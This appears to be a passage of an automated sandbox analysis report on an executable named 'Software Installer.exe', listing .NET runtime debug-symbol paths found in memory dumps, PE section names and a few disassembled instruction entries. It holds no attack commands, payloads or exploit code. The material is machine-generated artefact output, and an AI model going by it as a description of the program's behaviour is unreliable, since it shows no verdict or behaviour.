Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\Release\net8.0\System.Runtime.Serialization.Json.pdb source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256j?X source: Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\Release\net8.0\System.Runtime.Serialization.Json.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256: source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NetworkInformation.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdbSHA256_ source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256sU4T source: Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA2564w5 source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdb source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256u source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256CS source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256- source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256j source: Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256@ source: Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: Software Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Software Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Software Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Software Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Software Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: Software Installer.exe | Static PE information: section name: .CLR_UEF
Source: Software Installer.exe | Static PE information: section name: .didat
Source: Software Installer.exe | Static PE information: section name: Section
Source: Software Installer.exe | Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_00000196DC8F2200 push rcx; retf 0_2_00000196DC8F222B
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_00000196DC8F3638 push rax; iretd 0_2_00000196DC8F3639
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_00000196DE283A7E push rax; iretd 0_2_00000196DE283A81
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D773213E22 push rsi; ret 0_2_000001D773213E4E
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D77321204C push rbp; ret 0_2_000001D77321204D
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D773213520 push rsi; retf 0_2_000001D773213528
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D773214320 push rbp; iretd 0_2_000001D77321432F
Source: C:\Users\user\Desktop\Software Installer.exe | Code function: 0_2_000001D7751739C6 push rax; retf 0_2_000001D7751739C7
